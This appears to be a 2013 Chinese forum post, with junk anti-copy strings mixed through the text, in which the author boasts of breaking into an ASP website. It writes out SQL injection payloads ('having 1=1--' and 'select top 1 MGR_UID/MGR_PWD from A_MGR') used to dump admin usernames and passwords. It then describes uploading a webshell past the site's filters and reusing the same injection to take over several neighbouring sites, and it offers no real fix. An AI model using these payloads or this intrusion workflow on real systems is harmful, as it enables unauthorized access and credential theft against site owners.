发现一个注入点* B1 Z! K3 {/ c" _9 `
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
2 q( W) f& d% i0 Y- x. r
0 T( N# |; M5 Y% e3 u6 @习惯性的加’having1=1--
- L1 n2 R r3 W# e
# p8 b, s9 ]! f0 n2 Q- P' Vhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
) t6 p2 z4 X1 l) G S7 F
) ?' ?! d1 R' D: i* k3 ^0
' L7 ?0 M7 v& l7 S; a
/ P% `2 n+ c- X) _+ ~1 K5 Y; G爆出Diary_A.dl_Title(这时候很激动啊)
/ X( H2 C8 r# m8 c' @2 Q, x7 b) n2 x
那么继续
1 r- T8 A1 T9 C+ c6 p$ Jhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
$ K0 `- n8 s( w/ d; a# N7 x/ Q" @* g. v0 ]6 c# L& y5 R! s+ B
继续,一直爆下去
; v5 g6 C" i' i( ~. D
6 q! P: u; }5 `1 N/ B" M爆到几个字段和表段 但是没找到需要的管理用户的字段: Z$ j t* Q4 P# T. J
7 z* W, |$ o! v- d
蛋疼了 怎么办 然后去后台登陆页看源码 _! w1 w0 y3 R, I
) w; O8 `' p. d: P8 v" p4 C
00 T) ]- l% @ a) W9 x1 ?
- m5 H2 f& w( h6 @Input name= “ADUID”. A8 t& {8 P5 l. J# l; L7 T% a+ D6 r
Input name= “ADPWD”
( Y0 q" z- L! E% F% G: K7 q5 ]4 b3 o9 s% e0 ?& Q& Q
很幸运 找到了字段那就继续
$ V( `3 A+ O2 s, U# F" i找到之后开始爆用户6 I u/ l9 Z7 E5 ~+ P8 ]$ t v
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
+ j' Z5 v0 }! q) B6 E* }# K8 _爆密码
7 w3 G( g3 ^9 Y5 }9 Q3 j9 y$ Xhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—- P) `+ s& J8 `
测试了下 这个注入点只能爆到文章哪里的表 # I9 y! Y+ d& f+ c2 V* \# O: N
1 v) _$ j6 M8 o! g& {& l
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了" B+ T$ J3 c9 B. y1 `# u
) A7 I% I0 n) y P) L/ Y
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
t' Z7 U- e! F) @7 I, }
: ~. h4 c8 ^/ ~8 B. R473- B/ z( I3 B3 W% d( }
, p, q' M% o) @进后台
) K) L# I% `7 l( X8 ?& g
' N9 @' g2 a# |0 s1 \" y3 Z/ Z5 \. ^) [0 G
发现几个上传点 有的地方不能上传 而且防止恶意代码
- B+ t- H! Q f- L8 y; l. c/ _6 B, Y7 z% w$ `1 c4 A
没办法 各种百度各种找大牛 找到一只好像可以突破的马0 ?( V1 @4 K# u& R9 n
& ~$ w0 x) }. C% X2 p
- U- Y _/ |0 F* v在系统管理那里直接上传 不过没有显示地址
7 F$ a1 H+ {( l% g4 p9 T4 S
: T T4 D+ ]& s& W$ p' Q- X再上传一次 抓包 搞定OK
- Z. J* `: B, ~, P+ R; `" P& F. \5 M! u8 C
' \ ^! \2 R3 ]8 g/ N/ o% f2 T: S- a* v/ a( ^2 B7 e: |( x
4721 L( M, S2 s3 l5 m" P9 Z
3 E& H- t, A. Q
晚上不行了 去睡觉。。。7 D2 L9 s6 Z. O0 N9 V4 h- e9 Y8 }
第二天刚起床 闲的没事做继续日站吧 ; c: ?7 p; F+ Q; b$ \& v. M
5 g. X* {# \& T# B1 y6 q
找个站 就把这个站的旁c扫了下; e6 d- w: R( K# _' U$ ~2 m
) h4 r: c, W. N$ x, ?/ A
发现c段也有一个购物站 ,然后还和这个站的模板差不多
$ U1 x+ K9 h' M' s
- Q7 S3 h. e# M6 N就找到会员登录口测试
+ i! G$ \8 B' x. B5 {% \" [8 Y5 h$ P; Y( S/ @% u6 W/ a- K
'and (select top 1 MGR_UID from A_MGR)>0—
% a0 B* T1 _0 W' }6 q! y果断爆到了 这时候我很激动 通杀
. o$ c: t# w9 s: L% c' B6 l1 N* m4 w/ T7 h/ O
再次翻c段7 ~- I0 O9 A; Z" p# Q
1 N# L% B, C5 Y: a$ h翻出几个站 都成功拿下
( a( G6 g2 H( v) T4 l5 l& X; @- i) d' L& X( M
' B& E: f5 u2 O+ k, K% K- C4 D9 o- B' Z
修复方案:! B, y) i7 ^4 ?7 a
他们比我专业 2 y+ j+ [9 _3 l- R% x$ p
/ P3 S x8 t7 J5 P2 l. \1 n. f% T$ R2 |* C
, h. ]6 p' L$ F0 N3 N0 k4 Q
|
发表于 2013-4-4 17:40:38
收藏
支持
反对